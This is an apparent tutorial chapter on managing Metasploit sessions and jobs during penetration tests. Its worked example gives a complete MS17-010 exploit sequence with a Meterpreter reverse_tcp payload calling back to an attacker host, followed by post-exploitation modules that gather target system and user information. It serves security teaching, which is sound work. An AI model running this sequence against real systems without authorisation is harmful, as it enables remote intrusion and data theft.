Sessions and Jobs

Overview

Sessions and jobs in Metasploit enable penetration testers to manage multiple ongoing tasks, maintain access to exploited systems, and organize their workflows. This chapter focuses on understanding, creating, and managing sessions and jobs effectively.

Sessions in Metasploit

A session is an active connection between the attacker and the target system, established after a successful exploit. Sessions allow interaction with compromised systems through Meterpreter shells, command-line interfaces, or other payload connections.

Working with Sessions

  1. List Active Sessions:

    • View all open sessions:

      sessions
  2. Interact with a Session:

    • Switch to a specific session:

      sessions -i <session_id>
  3. Background a Session:

    • Send an active session to the background:

      background
    • Alternatively, use Ctrl+Z to background a session.

  4. Terminate a Session:

    • End a specific session:

      sessions -k <session_id>
    • Kill all active sessions:

      sessions -K
  5. View Session Information:

    • Display details about a specific session:

      sessions -i <session_id>
      info

Jobs in Metasploit

A job is a background task running in Metasploit. Jobs are often used for long-running tasks, such as exploit handlers or auxiliary modules like scanners.

Working with Jobs

  1. List Active Jobs:

    • Display all running jobs:

      jobs
  2. Stop a Job:

    • Terminate a specific job:

      jobs -k <job_id>
    • Kill all active jobs:

      jobs -K
  3. Run a Module as a Job:

    • Execute an exploit or auxiliary module in the background:

      exploit -j
  4. View Job Information:

    • Display detailed information about a job:

      jobs -v

Using Sessions and Jobs Together

  1. Exploit and Maintain Access:

    • Run an exploit in the background while monitoring active sessions:

      exploit -j
      sessions
  2. Link Modules to a Session:

    • Use post-exploitation modules on an existing session:

      use post/windows/gather/enum_logged_on_users
      set SESSION <session_id>
      run
  3. Switch Between Sessions:

    • Interact with multiple compromised systems by switching between sessions:

      sessions -i <session_id>
  4. Convert a Session to a Job:

    • Background a session to free up the console for other tasks:

      background

Practical Example: Meterpreter Session

  1. Create a Session:

    • Use an exploit to gain access:

      use exploit/windows/smb/ms17_010_psexec
      set payload windows/meterpreter/reverse_tcp
      set RHOSTS <target_ip>
      set LHOST <attacker_ip>
      exploit
  2. Interact with the Session:

    • Check active sessions:

      sessions
    • Interact with the session:

      sessions -i 1
  3. Background the Session:

    background
  4. Run a Post-Exploitation Module:

    • Gather system information from the target:

      use post/windows/gather/system_info
      set SESSION 1
      run

Best Practices

  1. Organize Sessions and Jobs:

    • Regularly list and terminate unused sessions and jobs to avoid conflicts.

  2. Track Active Sessions:

    • Use meaningful notes or labels to identify each session (e.g., IP or hostname).

  3. Monitor Resource Usage:

    • Avoid running too many concurrent jobs or sessions to prevent performance issues.

  4. Background Long-Running Tasks:

    • Always background tasks like handlers or scanners to free up the console.


Command Cheatsheet

Command
Description

sessions

List all active sessions.

sessions -i <id>

Interact with a specific session.

sessions -k <id>

Terminate a specific session.

sessions -K

Kill all active sessions.

jobs

List all running jobs.

jobs -k <id>

Terminate a specific job.

jobs -K

Kill all active jobs.

exploit -j

Run an exploit as a background job.

background

Background the current session.